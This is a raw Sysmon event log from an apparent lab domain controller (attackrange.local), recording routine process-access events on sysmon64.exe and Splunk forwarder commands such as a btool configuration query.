09:20:20.956{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053923Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.956{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053922Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.956{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053921Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.955{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053920Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.955{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053919Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.954{5EBD8912-8CBD-6151-0500-00000000FD01}416432C:\Windows\system32\csrss.exe{5EBD8912-8CD4-6151-5800-00000000FD01}3328C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053918Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.953{5EBD8912-8CD4-6151-5700-00000000FD01}36803684C:\Windows\system32\cmd.exe{5EBD8912-8CD4-6151-5800-00000000FD01}3328C:\Program Files\SplunkUniversalForwarder\bin\btool.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\system32\cmd.exe+f1e1|C:\Windows\system32\cmd.exe+11a37|C:\Windows\system32\cmd.exe+cb0d|C:\Windows\system32\cmd.exe+c295|C:\Windows\system32\cmd.exe+f916|C:\Windows\system32\cmd.exe+1510d|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053917Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.953{5EBD8912-8CD4-6151-5800-00000000FD01}3328C:\Program Files\SplunkUniversalForwarder\bin\btool.exe8.0.2btoolsplunk ApplicationSplunk Inc.btool.exebtool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=BC53EBF68CFA6E8A254D89ABEC89A65D,SHA256=97024B4A7182D9C253B1AC4E56A1C8F3BC8808B79E6D022EF27B95003622F0A4,IMPHASH=572E0CF4672412FA940B0E1835926B3B{5EBD8912-8CD4-6151-5700-00000000FD01}3680C:\Windows\System32\cmd.exeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-log 10341000x80000000000000001053916Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.951{5EBD8912-8CD1-6151-3500-00000000FD01}34363456C:\Windows\system32\conhost.exe{5EBD8912-8CD4-6151-5700-00000000FD01}3680C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053915Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.949{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053914Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.949{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053913Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.949{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053912Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.949{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053911Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.949{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053910Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.949{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8e6f|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053909Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.949{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053908Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.948{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053907Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.948{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053906Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.948{5EBD8912-8CBD-6151-0500-00000000FD01}416532C:\Windows\system32\csrss.exe{5EBD8912-8CD4-6151-5700-00000000FD01}3680C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5178f 10341000x80000000000000001053905Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.948{5EBD8912-8CD2-6151-4500-00000000FD01}38083812C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe{5EBD8912-8CD4-6151-5700-00000000FD01}3680C:\Windows\system32\cmd.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7404|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Windows\System32\ucrtbase.dll+9ea4a|C:\Windows\System32\ucrtbase.dll+9e42e|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+43bc6|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+18274|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+1adfc|C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe+4cf68|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 154100x80000000000000001053904Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.948{5EBD8912-8CD4-6151-5700-00000000FD01}3680C:\Windows\System32\cmd.exe10.0.14393.0 (rs1_release.160715-1616)Windows Command ProcessorMicrosoft® Windows® Operating SystemMicrosoft CorporationCmd.ExeC:\Windows\system32\cmd.exe /c btool server list replication_port --no-logC:\Windows\system32\NT AUTHORITY\SYSTEM{5EBD8912-8CBD-6151-E703-000000000000}0x3e70SystemMD5=F4F684066175B77E0C3A000549D2922C,SHA256=935C1861DF1F4018D698E8B65ABFA02D7E9037D8F68CA3C2065B6CA165D44AD2,IMPHASH=3062ED732D4B25D1C64F084DAC97D37A{5EBD8912-8CD2-6151-4500-00000000FD01}3808C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunk.exe" _internal pre-flight-checks --answer-yes --no-prompt 10341000x80000000000000001053903Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.931{5EBD8912-8CD2-6151-4700-00000000FD01}38483868C:\Windows\system32\conhost.exe{5EBD8912-8CD4-6151-5600-00000000FD01}3348C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053902Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.930{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+d3ae|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053901Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.930{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053900Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.929{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053899Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.929{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053898Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 09:20:20.929{5EBD8912-8CBF-6151-0C00-00000000FD01}844952C:\Windows\system32\svchost.exe{5EBD8912-8CD0-6151-2B00-00000000FD01}2392C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+e9d6|c:\windows\system32\lsm.dll+8fc1|c:\windows\system32\lsm.dll+8eb0|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001053897Microsoft-Windows-Sysmon/Operationalwin-dc-429.attackrange.local-2021-09-27 